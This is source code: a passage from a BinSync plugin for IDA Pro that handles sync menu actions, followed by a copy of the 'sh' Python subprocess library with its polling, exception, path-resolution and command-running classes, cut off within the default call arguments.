idaapi.get_func(func_addr) ret = self._do_action(action, user, ida_func) if not ret: return def _do_action(self, action, user, ida_func): if user is None: print(f"[BinSync]: Error! No user selected for syncing.") return False if action == BinsyncMenuActionItem.SYNC_SELECTED_FUNCTIONS: cursor_at_func = compat.get_function_cursor_at() # if currently looking at a function, do a fill now if ida_func and cursor_at_func == ida_func.start_ea: self.controller.fill_function(ida_func.start_ea, user=user) # otherwise, do it later else: if ida_func and ida_func.start_ea: try: target_user_state = self.controller.client.get_state(user=user) target_func = target_user_state.get_function(ida_func.start_ea) remote_name = target_func.name if remote_name != "" and remote_name: compat.set_ida_func_name(ida_func.start_ea, remote_name) except Exception: pass update_task = UpdateTask( self.controller.fill_function, ida_func.start_ea, user=user ) print(f"[BinSync]: Caching sync for \'{user}\' on function {hex(ida_func.start_ea)}.") self.controller.update_states[ida_func.start_ea].add_update_task(update_task) elif action == BinsyncMenuActionItem.TOGGLE_AUTO_SYNC: update_task = UpdateTask( self.controller.fill_function, ida_func.start_ea, user=user ) print(f"[BinSync]: Toggling auto-sync for user \'{user}\' in function {hex(ida_func.start_ea)}.") self.controller.update_states[ida_func.start_ea].toggle_auto_sync_task(update_task) elif action == BinsyncMenuActionItem.SYNC_ALL_FUNCTIONS: threading.Thread(target=self.controller.sync_all, kwargs={"user": user}).start() #self.controller.sync_all(user=user) print(f"[BinSync]: All data has been synced from user: {user}.") elif action == BinsyncMenuActionItem.SYNC_STRUCTS: self.controller.fill_structs(user=user) print(f"[BinSync]: All structs have been synced from user: {user}") else: print(f"[BinSync]: Error parsing sync action!") return False return True def _get_selected_funcs(self): """ Return the list of function names selected in the Functions window. Warning: It's possible that we don't get the correct name for a function lookup. In that case, this function will fail. See: https://github.com/gaasedelen/prefix/blob/master/plugin/ida_prefix.py#L567 """ twidget = idaapi.find_widget("Functions window") widget = sip.wrapinstance(int(twidget), QWidget) if not widget: idaapi.warning("Unable to find 'Functions window'") return # # locate the table widget within the Functions window that actually holds # all the visible function metadata # table: QTableView = widget.findChild(QTableView) # # scrape the selected function names from the Functions window table # selected_funcs = [str(s.data()) for s in table.selectionModel().selectedRows()] selected_func_addrs = [idaapi.get_name_ea(idaapi.BADADDR, func_name) for func_name in selected_funcs] return selected_func_addrs
sh_it.py
""" http://amoffat.github.io/sh/ """ # =============================================================================== # Copyright (C) 2011-2020 by Andrew Moffat # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. # =============================================================================== __version__ = "1.14.1" __project_url__ = "https://github.com/amoffat/sh" from collections import deque try: from collections.abc import Mapping except ImportError: from collections import Mapping from contextlib import contextmanager from functools import partial from io import UnsupportedOperation, open as fdopen from locale import getpreferredencoding from types import ModuleType, GeneratorType import ast import errno try: import fcntl except ModuleNotFoundError: pass import gc import getpass import glob as glob_module import inspect import logging import os import platform try: import pty except ModuleNotFoundError: pass try: import pwd except ModuleNotFoundError: pass import re import select import signal import stat import struct try: import sys except ModuleNotFoundError: pass try: import termios except ModuleNotFoundError: pass import threading import time import traceback try: import tty except ModuleNotFoundError: pass import warnings import weakref IS_PY3 = sys.version_info[0] == 3 MINOR_VER = sys.version_info[1] IS_PY26 = sys.version_info[0] == 2 and MINOR_VER == 6 if IS_PY3: from io import StringIO ioStringIO = StringIO from io import BytesIO as cStringIO iocStringIO = cStringIO from queue import Queue, Empty # for some reason, python 3.1 removed the builtin "callable", wtf if not hasattr(__builtins__, "callable"): def callable(ob): return hasattr(ob, "__call__") else: from StringIO import StringIO from cStringIO import OutputType as cStringIO from io import StringIO as ioStringIO from io import BytesIO as iocStringIO from Queue import Queue, Empty try: from shlex import quote as shlex_quote # here from 3.3 onward except ImportError: from pipes import quote as shlex_quote # undocumented before 2.7 # PBS is unsupported, this error never runs on windows anyhow, so many earlier imports # if "windows" in platform.system().lower(): # pragma: no cover # raise ImportError("sh %s is currently only supported on linux and osx. \ # please install pbs 0.110 (http://pypi.python.org/pypi/pbs) for windows \ # support." % __version__) DEFAULT_ENCODING = getpreferredencoding() or "UTF-8" IS_MACOS = platform.system() in ("AIX", "Darwin") THIS_DIR = os.path.dirname(os.path.realpath(__file__)) SH_LOGGER_NAME = __name__ # normally i would hate this idea of using a global to signify whether we are # running tests, because it breaks the assumption that what is running in the # tests is what will run live, but we ONLY use this in a place that has no # serious side-effects that could change anything. as long as we do that, it # should be ok RUNNING_TESTS = bool(int(os.environ.get("SH_TESTS_RUNNING", "0"))) FORCE_USE_SELECT = bool(int(os.environ.get("SH_TESTS_USE_SELECT", "0"))) # a re-entrant lock for pushd. this way, multiple threads that happen to use # pushd will all see the current working directory for the duration of the # with-context PUSHD_LOCK = threading.RLock() if hasattr(inspect, "getfullargspec"): def get_num_args(fn): return len(inspect.getfullargspec(fn).args) else: def get_num_args(fn): return len(inspect.getargspec(fn).args) if IS_PY3: raw_input = input unicode = str basestring = str long = int _unicode_methods = set(dir(unicode())) HAS_POLL = hasattr(select, "poll") POLLER_EVENT_READ = 1 POLLER_EVENT_WRITE = 2 POLLER_EVENT_HUP = 4 POLLER_EVENT_ERROR = 8 # here we use an use a poller interface that transparently selects the most # capable poller (out of either select.select or select.poll). this was added # by zhangyafeikimi when he discovered that if the fds created internally by sh # numbered > 1024, select.select failed (a limitation of select.select). this # can happen if your script opens a lot of files if HAS_POLL and not FORCE_USE_SELECT: class Poller(object): def __init__(self): self._poll = select.poll() # file descriptor <-> file object bidirectional maps self.fd_lookup = {} self.fo_lookup = {} def __nonzero__(self): return len(self.fd_lookup) != 0 def __len__(self): return len(self.fd_lookup) def _set_fileobject(self, f): if hasattr(f, "fileno"): fd = f.fileno() self.fd_lookup[fd] = f self.fo_lookup[f] = fd else: self.fd_lookup[f] = f self.fo_lookup[f] = f def _remove_fileobject(self, f): if hasattr(f, "fileno"): fd = f.fileno() del self.fd_lookup[fd] del self.fo_lookup[f] else: del self.fd_lookup[f] del self.fo_lookup[f] def _get_file_descriptor(self, f): return self.fo_lookup.get(f) def _get_file_object(self, fd): return self.fd_lookup.get(fd) def _register(self, f, events): # f can be a file descriptor or file object self._set_fileobject(f) fd = self._get_file_descriptor(f) self._poll.register(fd, events) def register_read(self, f): self._register(f, select.POLLIN | select.POLLPRI) def register_write(self, f): self._register(f, select.POLLOUT) def register_error(self, f): self._register(f, select.POLLERR | select.POLLHUP | select.POLLNVAL) def unregister(self, f): fd = self._get_file_descriptor(f) self._poll.unregister(fd) self._remove_fileobject(f) def poll(self, timeout): if timeout is not None: # convert from seconds to milliseconds timeout *= 1000 changes = self._poll.poll(timeout) results = [] for fd, events in changes: f = self._get_file_object(fd) if events & (select.POLLIN | select.POLLPRI): results.append((f, POLLER_EVENT_READ)) elif events & select.POLLOUT: results.append((f, POLLER_EVENT_WRITE)) elif events & select.POLLHUP: results.append((f, POLLER_EVENT_HUP)) elif events & (select.POLLERR | select.POLLNVAL): results.append((f, POLLER_EVENT_ERROR)) return results else: class Poller(object): def __init__(self): self.rlist = [] self.wlist = [] self.xlist = [] def __nonzero__(self): return len(self.rlist) + len(self.wlist) + len(self.xlist) != 0 def __len__(self): return len(self.rlist) + len(self.wlist) + len(self.xlist) @staticmethod def _register(f, events): if f not in events: events.append(f) @staticmethod def _unregister(f, events): if f in events: events.remove(f) def register_read(self, f): self._register(f, self.rlist) def register_write(self, f): self._register(f, self.wlist) def register_error(self, f): self._register(f, self.xlist) def unregister(self, f): self._unregister(f, self.rlist) self._unregister(f, self.wlist) self._unregister(f, self.xlist) def poll(self, timeout): _in, _out, _err = select.select(self.rlist, self.wlist, self.xlist, timeout) results = [] for f in _in: results.append((f, POLLER_EVENT_READ)) for f in _out: results.append((f, POLLER_EVENT_WRITE)) for f in _err: results.append((f, POLLER_EVENT_ERROR)) return results def encode_to_py3bytes_or_py2str(s): """ takes anything and attempts to return a py2 string or py3 bytes. this is typically used when creating command + arguments to be executed via os.exec* """ fallback_encoding = "utf8" if IS_PY3: # if we're already bytes, do nothing if isinstance(s, bytes): pass else: s = str(s) try: s = bytes(s, DEFAULT_ENCODING) except UnicodeEncodeError: s = bytes(s, fallback_encoding) else: # attempt to convert the thing to unicode from the system's encoding try: s = unicode(s, DEFAULT_ENCODING) # if the thing is already unicode, or it's a number, it can't be # coerced to unicode with an encoding argument, but if we leave out # the encoding argument, it will convert it to a string, then to unicode except TypeError: s = unicode(s) # now that we have guaranteed unicode, encode to our system encoding, # but attempt to fall back to something try: s = s.encode(DEFAULT_ENCODING) except UnicodeEncodeError: s = s.encode(fallback_encoding, "replace") return s def _indent_text(text, num=4): lines = [] for line in text.split("\n"): line = (" " * num) + line lines.append(line) return "\n".join(lines) class ForkException(Exception): def __init__(self, orig_exc): tmpl = """ Original exception: =================== %s """ msg = tmpl % _indent_text(orig_exc) Exception.__init__(self, msg) class ErrorReturnCodeMeta(type): """ a metaclass which provides the ability for an ErrorReturnCode (or derived) instance, imported from one sh module, to be considered the subclass of ErrorReturnCode from another module. this is mostly necessary in the tests, where we do assertRaises, but the ErrorReturnCode that the program we're testing throws may not be the same class that we pass to assertRaises """ def __subclasscheck__(self, o): other_bases = set([b.__name__ for b in o.__bases__]) return self.__name__ in other_bases or o.__name__ == self.__name__ class ErrorReturnCode(Exception): __metaclass__ = ErrorReturnCodeMeta """ base class for all exceptions as a result of a command's exit status being deemed an error. this base class is dynamically subclassed into derived classes with the format: ErrorReturnCode_NNN where NNN is the exit code number. the reason for this is it reduces boiler plate code when testing error return codes: try: some_cmd() except ErrorReturnCode_12: print("couldn't do X") vs: try: some_cmd() except ErrorReturnCode as e: if e.exit_code == 12: print("couldn't do X") it's not much of a savings, but i believe it makes the code easier to read """ truncate_cap = 750 def __reduce__(self): return self.__class__, (self.full_cmd, self.stdout, self.stderr, self.truncate) def __init__(self, full_cmd, stdout, stderr, truncate=True): self.full_cmd = full_cmd self.stdout = stdout self.stderr = stderr self.truncate = truncate exc_stdout = self.stdout if truncate: exc_stdout = exc_stdout[:self.truncate_cap] out_delta = len(self.stdout) - len(exc_stdout) if out_delta: exc_stdout += ("... (%d more, please see e.stdout)" % out_delta).encode() exc_stderr = self.stderr if truncate: exc_stderr = exc_stderr[:self.truncate_cap] err_delta = len(self.stderr) - len(exc_stderr) if err_delta: exc_stderr += ("... (%d more, please see e.stderr)" % err_delta).encode() msg_tmpl = unicode("\n\n RAN: {cmd}\n\n STDOUT:\n{stdout}\n\n STDERR:\n{stderr}") msg = msg_tmpl.format( cmd=self.full_cmd, stdout=exc_stdout.decode(DEFAULT_ENCODING, "replace"), stderr=exc_stderr.decode(DEFAULT_ENCODING, "replace") ) if not IS_PY3: # Exception messages should be treated as an API which takes native str type on both # Python2 and Python3. (Meaning, it's a byte string on Python2 and a text string on # Python3) msg = encode_to_py3bytes_or_py2str(msg) super(ErrorReturnCode, self).__init__(msg) class SignalException(ErrorReturnCode): pass class TimeoutException(Exception): """ the exception thrown when a command is killed because a specified timeout (via _timeout or .wait(timeout)) was hit """ def __init__(self, exit_code, full_cmd): self.exit_code = exit_code self.full_cmd = full_cmd super(Exception, self).__init__() try: SIGNALS_THAT_SHOULD_THROW_EXCEPTION = set(( signal.SIGABRT, signal.SIGBUS, signal.SIGFPE, signal.SIGILL, signal.SIGINT, signal.SIGKILL, signal.SIGPIPE, signal.SIGQUIT, signal.SIGSEGV, signal.SIGTERM, signal.SIGSYS, )) except: pass # we subclass AttributeError because: # https://github.com/ipython/ipython/issues/2577 # https://github.com/amoffat/sh/issues/97#issuecomment-10610629 class CommandNotFound(AttributeError): pass rc_exc_regex = re.compile(r"(ErrorReturnCode|SignalException)_((\d+)|SIG[a-zA-Z]+)") rc_exc_cache = {} SIGNAL_MAPPING = dict([(v, k) for k, v in signal.__dict__.items() if re.match(r"SIG[a-zA-Z]+", k)]) def get_exc_from_name(name): """ takes an exception name, like: ErrorReturnCode_1 SignalException_9 SignalException_SIGHUP and returns the corresponding exception. this is primarily used for importing exceptions from sh into user code, for instance, to capture those exceptions """ exc = None try: return rc_exc_cache[name] except KeyError: m = rc_exc_regex.match(name) if m: base = m.group(1) rc_or_sig_name = m.group(2) if base == "SignalException": try: rc = -int(rc_or_sig_name) except ValueError: rc = -getattr(signal, rc_or_sig_name) else: rc = int(rc_or_sig_name) exc = get_rc_exc(rc) return exc def get_rc_exc(rc): """ takes a exit code or negative signal number and produces an exception that corresponds to that return code. positive return codes yield ErrorReturnCode exception, negative return codes yield SignalException we also cache the generated exception so that only one signal of that type exists, preserving identity """ try: return rc_exc_cache[rc] except KeyError: pass if rc >= 0: name = "ErrorReturnCode_%d" % rc base = ErrorReturnCode else: signame = SIGNAL_MAPPING[abs(rc)] name = "SignalException_" + signame base = SignalException exc = ErrorReturnCodeMeta(name, (base,), {"exit_code": rc}) rc_exc_cache[rc] = exc return exc # we monkey patch glob. i'm normally generally against monkey patching, but i # decided to do this really un-intrusive patch because we need a way to detect # if a list that we pass into an sh command was generated from glob. the reason # being that glob returns an empty list if a pattern is not found, and so # commands will treat the empty list as no arguments, which can be a problem, # ie: # # ls(glob("*.ojfawe")) # # ^ will show the contents of your home directory, because it's essentially # running ls([]) which, as a process, is just "ls". # # so we subclass list and monkey patch the glob function. nobody should be the # wiser, but we'll have results that we can make some determinations on _old_glob = glob_module.glob class GlobResults(list): def __init__(self, path, results): self.path = path list.__init__(self, results) def glob(path, *args, **kwargs): expanded = GlobResults(path, _old_glob(path, *args, **kwargs)) return expanded glob_module.glob = glob def canonicalize(path): return os.path.abspath(os.path.expanduser(path)) def which(program, paths=None): """ takes a program name or full path, plus an optional collection of search paths, and returns the full path of the requested executable. if paths is specified, it is the entire list of search paths, and the PATH env is not used at all. otherwise, PATH env is used to look for the program """ def is_exe(file_path): return (os.path.exists(file_path) and os.access(file_path, os.X_OK) and os.path.isfile(os.path.realpath(file_path))) found_path = None fpath, fname = os.path.split(program) # if there's a path component, then we've specified a path to the program, # and we should just test if that program is executable. if it is, return if fpath: program = canonicalize(program) if is_exe(program): found_path = program # otherwise, we've just passed in the program name, and we need to search # the paths to find where it actually lives else: paths_to_search = [] if isinstance(paths, (tuple, list)): paths_to_search.extend(paths) else: env_paths = os.environ.get("PATH", "").split(os.pathsep) paths_to_search.extend(env_paths) for path in paths_to_search: exe_file = os.path.join(canonicalize(path), program) if is_exe(exe_file): found_path = exe_file break return found_path def resolve_command_path(program): path = which(program) if not path: # our actual command might have a dash in it, but we can't call # that from python (we have to use underscores), so we'll check # if a dash version of our underscore command exists and use that # if it does if "_" in program: path = which(program.replace("_", "-")) if not path: return None return path def resolve_command(name, baked_args=None): path = resolve_command_path(name) cmd = None if path: cmd = Command(path) if baked_args: cmd = cmd.bake(**baked_args) return cmd class Logger(object): """ provides a memory-inexpensive logger. a gotcha about python's builtin logger is that logger objects are never garbage collected. if you create a thousand loggers with unique names, they'll sit there in memory until your script is done. with sh, it's easy to create loggers with unique names if we want our loggers to include our command arguments. for example, these are all unique loggers: ls -l ls -l /tmp ls /tmp so instead of creating unique loggers, and without sacrificing logging output, we use this class, which maintains as part of its state, the logging "context", which will be the very unique name. this allows us to get a logger with a very general name, eg: "command", and have a unique name appended to it via the context, eg: "ls -l /tmp" """ def __init__(self, name, context=None): self.name = name self.log = logging.getLogger("%s.%s" % (SH_LOGGER_NAME, name)) self.context = self.sanitize_context(context) def _format_msg(self, msg, *a): if self.context: msg = "%s: %s" % (self.context, msg) return msg % a @staticmethod def sanitize_context(context): if context: context = context.replace("%", "%%") return context or "" def get_child(self, name, context): new_name = self.name + "." + name new_context = self.context + "." + context return Logger(new_name, new_context) def info(self, msg, *a): self.log.info(self._format_msg(msg, *a)) def debug(self, msg, *a): self.log.debug(self._format_msg(msg, *a)) def error(self, msg, *a): self.log.error(self._format_msg(msg, *a)) def exception(self, msg, *a): self.log.exception(self._format_msg(msg, *a)) def default_logger_str(cmd, call_args, pid=None): if pid: s = "<Command %r, pid %d>" % (cmd, pid) else: s = "<Command %r>" % cmd return s class RunningCommand(object): """ this represents an executing Command object. it is returned as the result of __call__() being executed on a Command instance. this creates a reference to a OProc instance, which is a low-level wrapper around the process that was exec'd this is the class that gets manipulated the most by user code, and so it implements various convenience methods and logical mechanisms for the underlying process. for example, if a user tries to access a backgrounded-process's stdout/err, the RunningCommand object is smart enough to know to wait() on the process to finish first. and when the process finishes, RunningCommand is smart enough to translate exit codes to exceptions. """ # these are attributes that we allow to pass through to OProc _OProc_attr_whitelist = set(( "signal", "terminate", "kill", "kill_group", "signal_group", "pid", "sid", "pgid", "ctty", "input_thread_exc", "output_thread_exc", "bg_thread_exc", )) def __init__(self, cmd, call_args, stdin, stdout, stderr): """ cmd is a list, where each element is encoded as bytes (PY3) or str (PY2) """ # self.ran is used for auditing what actually ran. for example, in # exceptions, or if you just want to know what was ran after the # command ran # # here we're making a consistent unicode string out if our cmd. # we're also assuming (correctly, i think) that the command and its # arguments are the encoding we pass into _encoding, which falls back to # the system's encoding enc = call_args["encoding"] self.ran = " ".join([shlex_quote(arg.decode(enc, "ignore")) for arg in cmd]) self.call_args = call_args self.cmd = cmd self.process = None self._waited_until_completion = False should_wait = True spawn_process = True # this is used to track if we've already raised StopIteration, and if we # have, raise it immediately again if the user tries to call next() on # us. https://github.com/amoffat/sh/issues/273 self._stopped_iteration = False # with contexts shouldn't run at all yet, they prepend # to every command in the context if call_args["with"]: spawn_process = False get_prepend_stack().append(self) if call_args["piped"] or call_args["iter"] or call_args["iter_noblock"]: should_wait = False # we're running in the background, return self and let us lazily # evaluate if call_args["bg"]: should_wait = False # redirection if call_args["err_to_out"]: stderr = OProc.STDOUT done_callback = call_args["done"] if done_callback: call_args["done"] = partial(done_callback, self) # set up which stream should write to the pipe # TODO, make pipe None by default and limit the size of the Queue # in oproc.OProc pipe = OProc.STDOUT if call_args["iter"] == "out" or call_args["iter"] is True: pipe = OProc.STDOUT elif call_args["iter"] == "err": pipe = OProc.STDERR if call_args["iter_noblock"] == "out" or call_args["iter_noblock"] is True: pipe = OProc.STDOUT elif call_args["iter_noblock"] == "err": pipe = OProc.STDERR # there's currently only one case where we wouldn't spawn a child # process, and that's if we're using a with-context with our command self._spawned_and_waited = False if spawn_process: log_str_factory = call_args["log_msg"] or default_logger_str logger_str = log_str_factory(self.ran, call_args) self.log = Logger("command", logger_str) self.log.debug("starting process") if should_wait: self._spawned_and_waited = True # this lock is needed because of a race condition where a background # thread, created in the OProc constructor, may try to access # self.process, but it has not been assigned yet process_assign_lock = threading.Lock() with process_assign_lock: self.process = OProc(self, self.log, cmd, stdin, stdout, stderr, self.call_args, pipe, process_assign_lock) logger_str = log_str_factory(self.ran, call_args, self.process.pid) self.log.context = self.log.sanitize_context(logger_str) self.log.info("process started") if should_wait: self.wait() def wait(self, timeout=None): """ waits for the running command to finish. this is called on all running commands, eventually, except for ones that run in the background if timeout is a number, it is the number of seconds to wait for the process to resolve. otherwise block on wait. this function can raise a TimeoutException, either because of a `_timeout` on the command itself as it was launched, or because of a timeout passed into this method. """ if not self._waited_until_completion: # if we've been given a timeout, we need to poll is_alive() if timeout is not None: waited_for = 0 sleep_amt = 0.1 alive = False exit_code = None if timeout < 0: raise RuntimeError("timeout cannot be negative") # while we still have time to wait, run this loop # notice that alive and exit_code are only defined in this loop, but the loop is also guaranteed to run, # defining them, given the constraints that timeout is non-negative while waited_for <= timeout: alive, exit_code = self.process.is_alive() # if we're alive, we need to wait some more, but let's sleep before we poll again if alive: time.sleep(sleep_amt) waited_for += sleep_amt # but if we're not alive, we're done waiting else: break # if we've made it this far, and we're still alive, then it means we timed out waiting if alive: raise TimeoutException(None, self.ran) # if we didn't time out, we fall through and let the rest of the code handle exit_code. # notice that we set _waited_until_completion here, only if we didn't time out. this allows us to # re-wait again on timeout, if we catch the TimeoutException in the parent frame self._waited_until_completion = True else: exit_code = self.process.wait() self._waited_until_completion = True if self.process.timed_out: # if we timed out, our exit code represents a signal, which is # negative, so let's make it positive to store in our # TimeoutException raise TimeoutException(-exit_code, self.ran) else: self.handle_command_exit_code(exit_code) # if an iterable command is using an instance of OProc for its stdin, # wait on it. the process is probably set to "piped", which means it # won't be waited on, which means exceptions won't propagate up to the # main thread. this allows them to bubble up if self.process._stdin_process: self.process._stdin_process.command.wait() self.log.debug("process completed") return self def is_alive(self): """ returns whether or not we're still alive. this call has side-effects on OProc """ return self.process.is_alive()[0] def handle_command_exit_code(self, code): """ here we determine if we had an exception, or an error code that we weren't expecting to see. if we did, we create and raise an exception """ ca = self.call_args exc_class = get_exc_exit_code_would_raise(code, ca["ok_code"], ca["piped"]) if exc_class: exc = exc_class(self.ran, self.process.stdout, self.process.stderr, ca["truncate_exc"]) raise exc @property def stdout(self): self.wait() return self.process.stdout @property def stderr(self): self.wait() return self.process.stderr @property def exit_code(self): self.wait() return self.process.exit_code def __len__(self): return len(str(self)) def __enter__(self): """ we don't actually do anything here because anything that should have been done would have been done in the Command.__call__ call. essentially all that has to happen is the command be pushed on the prepend stack. """ pass def __iter__(self): return self def next(self): """ allow us to iterate over the output of our command """ if self._stopped_iteration: raise StopIteration() # we do this because if get blocks, we can't catch a KeyboardInterrupt # so the slight timeout allows for that. while True: try: chunk = self.process._pipe_queue.get(True, self.call_args["iter_poll_time"]) except Empty: if self.call_args["iter_noblock"]: return errno.EWOULDBLOCK else: if chunk is None: self.wait() self._stopped_iteration = True raise StopIteration() try: return chunk.decode(self.call_args["encoding"], self.call_args["decode_errors"]) except UnicodeDecodeError: return chunk # python 3 __next__ = next def __exit__(self, exc_type, exc_val, exc_tb): if self.call_args["with"] and get_prepend_stack(): get_prepend_stack().pop() def __str__(self): """ in python3, should return unicode. in python2, should return a string of bytes """ if IS_PY3: return self.__unicode__() else: return unicode(self).encode(self.call_args["encoding"]) def __unicode__(self): """ a magic method defined for python2. calling unicode() on a RunningCommand object will call this """ if self.process and self.stdout: return self.stdout.decode(self.call_args["encoding"], self.call_args["decode_errors"]) elif IS_PY3: return "" else: return unicode("") def __eq__(self, other): return unicode(self) == unicode(other) __hash__ = None # Avoid DeprecationWarning in Python < 3 def __contains__(self, item): return item in str(self) def __getattr__(self, p): # let these three attributes pass through to the OProc object if p in self._OProc_attr_whitelist: if self.process: return getattr(self.process, p) else: raise AttributeError # see if strings have what we're looking for. we're looking at the # method names explicitly because we don't want to evaluate self unless # we absolutely have to, the reason being, in python2, hasattr swallows # exceptions, and if we try to run hasattr on a command that failed and # is being run with _iter=True, the command will be evaluated, throw an # exception, but hasattr will discard it if p in _unicode_methods: return getattr(unicode(self), p) raise AttributeError def __repr__(self): """ in python3, should return unicode. in python2, should return a string of bytes """ try: return str(self) except UnicodeDecodeError: if self.process: if self.stdout: return repr(self.stdout) return repr("") def __long__(self): return long(str(self).strip()) def __float__(self): return float(str(self).strip()) def __int__(self): return int(str(self).strip()) def output_redirect_is_filename(out): return isinstance(out, basestring) def get_prepend_stack(): tl = Command.thread_local if not hasattr(tl, "_prepend_stack"): tl._prepend_stack = [] return tl._prepend_stack def special_kwarg_validator(passed_kwargs, merged_kwargs, invalid_list): s1 = set(passed_kwargs.keys()) invalid_args = [] for elem in invalid_list: if callable(elem): fn = elem ret = fn(passed_kwargs, merged_kwargs) invalid_args.extend(ret) else: elem, error_msg = elem if s1.issuperset(elem): invalid_args.append((elem, error_msg)) return invalid_args def get_fileno(ob): # in py2, this will return None. in py3, it will return an method that # raises when called fileno_meth = getattr(ob, "fileno", None) fileno = None if fileno_meth: # py3 StringIO objects will report a fileno, but calling it will raise # an exception try: fileno = fileno_meth() except UnsupportedOperation: pass elif isinstance(ob, (int, long)) and ob >= 0: fileno = ob return fileno def ob_is_fd_based(ob): return get_fileno(ob) is not None def ob_is_tty(ob): """ checks if an object (like a file-like object) is a tty. """ fileno = get_fileno(ob) is_tty = False if fileno is not None: is_tty = os.isatty(fileno) return is_tty def ob_is_pipe(ob): fileno = get_fileno(ob) is_pipe = False if fileno: fd_stat = os.fstat(fileno) is_pipe = stat.S_ISFIFO(fd_stat.st_mode) return is_pipe def tty_in_validator(passed_kwargs, merged_kwargs): # here we'll validate that people aren't randomly shotgun-debugging different tty options and hoping that they'll # work, without understanding what they do pairs = (("tty_in", "in"), ("tty_out", "out")) invalid = [] for tty_type, std in pairs: if tty_type in passed_kwargs and ob_is_tty(passed_kwargs.get(std, None)): error = "`_%s` is a TTY already, so so it doesn't make sense to set up a TTY with `_%s`" % (std, tty_type) invalid.append(((tty_type, std), error)) # if unify_ttys is set, then both tty_in and tty_out must both be True if merged_kwargs["unify_ttys"] and not (merged_kwargs["tty_in"] and merged_kwargs["tty_out"]): invalid.append(( ("unify_ttys", "tty_in", "tty_out"), "`_tty_in` and `_tty_out` must both be True if `_unify_ttys` is True" )) return invalid def fg_validator(passed_kwargs, merged_kwargs): """ fg is not valid with basically every other option """ invalid = [] msg = """\ _fg is invalid with nearly every other option, see warning and workaround here: https://amoffat.github.io/sh/sections/special_arguments.html#fg""" whitelist = set(("env", "fg", "cwd")) offending = set(passed_kwargs.keys()) - whitelist if "fg" in passed_kwargs and passed_kwargs["fg"] and offending: invalid.append(("fg", msg)) return invalid def bufsize_validator(passed_kwargs, merged_kwargs): """ a validator to prevent a user from saying that they want custom buffering when they're using an in/out object that will be os.dup'ed to the process, and has its own buffering. an example is a pipe or a tty. it doesn't make sense to tell them to have a custom buffering, since the os controls this. """ invalid = [] in_ob = passed_kwargs.get("in", None) out_ob = passed_kwargs.get("out", None) in_buf = passed_kwargs.get("in_bufsize", None) out_buf = passed_kwargs.get("out_bufsize", None) in_no_buf = ob_is_fd_based(in_ob) out_no_buf = ob_is_fd_based(out_ob) err = "Can't specify an {target} bufsize if the {target} target is a pipe or TTY" if in_no_buf and in_buf is not None: invalid.append((("in", "in_bufsize"), err.format(target="in"))) if out_no_buf and out_buf is not None: invalid.append((("out", "out_bufsize"), err.format(target="out"))) return invalid def env_validator(passed_kwargs, merged_kwargs): """ a validator to check that env is a dictionary and that all environment variable keys and values are strings. Otherwise, we would exit with a confusing exit code 255. """ invalid = [] env = passed_kwargs.get("env", None) if env is None: return invalid if not isinstance(env, Mapping): invalid.append(("env", "env must be dict-like. Got {!r}".format(env))) return invalid for k, v in passed_kwargs["env"].items(): if not isinstance(k, str): invalid.append(("env", "env key {!r} must be a str".format(k))) if not isinstance(v, str): invalid.append(("env", "value {!r} of env key {!r} must be a str".format(v, k))) return invalid class Command(object): """ represents an un-run system program, like "ls" or "cd". because it represents the program itself (and not a running instance of it), it should hold very little state. in fact, the only state it does hold is baked arguments. when a Command object is called, the result that is returned is a RunningCommand object, which represents the Command put into an execution state. """ thread_local = threading.local() _call_args = { "fg": False, # run command in foreground # run a command in the background. commands run in the background # ignore SIGHUP and do not automatically exit when the parent process # ends "bg": False, # automatically report exceptions for background commands "bg_exc": True, "with": False, # prepend the command to every command after it "in": None, "out": None, # redirect STDOUT "err": None, # redirect STDERR "err_to_out": None, # redirect STDERR to STDOUT # stdin buffer size # 1 for line, 0 for unbuffered, any other number for that amount "in_bufsize": 0, # stdout buffer size, same values as above "out_bufsize": 1, "err_bufsize": 1, # this is how big the output buffers will be for stdout and stderr. # this is essentially how much output they will store from the process. # we use a deque, so if it overflows past this amount, the first items # get pushed off as each new item gets added. # # NOTICE # this is not a *BYTE* size, this is a *CHUNK* size...meaning, that if # you're buffering out/err at 1024 bytes, the internal buffer size will # be "internal_bufsize" CHUNKS of 1024 bytes "internal_bufsize": 3 * 1024 ** 2, "env": None, "piped": None, "iter": None, "iter_noblock": None, # the amount of time to sleep between polling for the iter output queue "iter_poll_time": 0.1, "ok_code": 0, "cwd": None, # the separator delimiting between a long-argument's name and its value # setting this to None will cause name and value to be two separate # arguments, like for short options # for example, --arg=derp, '=' is the long_sep "long_sep": "=", # the prefix used for long arguments "long_prefix": "--", # this is for programs that expect their input to be from a terminal. # ssh is one of those programs "tty_in": False, "tty_out": True, "unify_ttys": False, "encoding": DEFAULT_ENCODING, "decode_errors": "strict", # how long the process should run before it is auto-killed "timeout": None, "timeout_signal": 0 , # signal.SIGKILL, # TODO write some docs on "long-running processes" # these control whether or not stdout/err will get aggregated together # as the process runs. this has memory usage implications, so sometimes # with long-running processes with a lot of data, it makes sense to # set these to true "no_out": False, "no_err": False, "no_pipe": False, # if any redirection is used for stdout or stderr, internal buffering # of that data is not stored. this forces it to be stored, as if # the output is being T'd to both the redirected destination and our # internal buffers "tee": None, # will be called when a process terminates regardless of exception "done": None, # a tuple (rows, columns) of the desired size of both the stdout and # stdin ttys, if ttys are being used "tty_size": (20, 80), # whether or not our exceptions should be truncated "truncate_exc": True, # a function to call after the child forks but before the process execs "preexec_fn": None, # UID to set after forking. Requires root privileges. Not supported on # Windows. "uid": None, # put the forked process in its own process session? "new_session": True, # pre-process args passed into __call__. only really useful when used # in .bake() "arg_preprocess": None, # a callable that produces a log message from an argument tuple of the # command and the args "log_msg": None, # whether or not to close all inherited fds. typically, this should be True, as inheriting fds 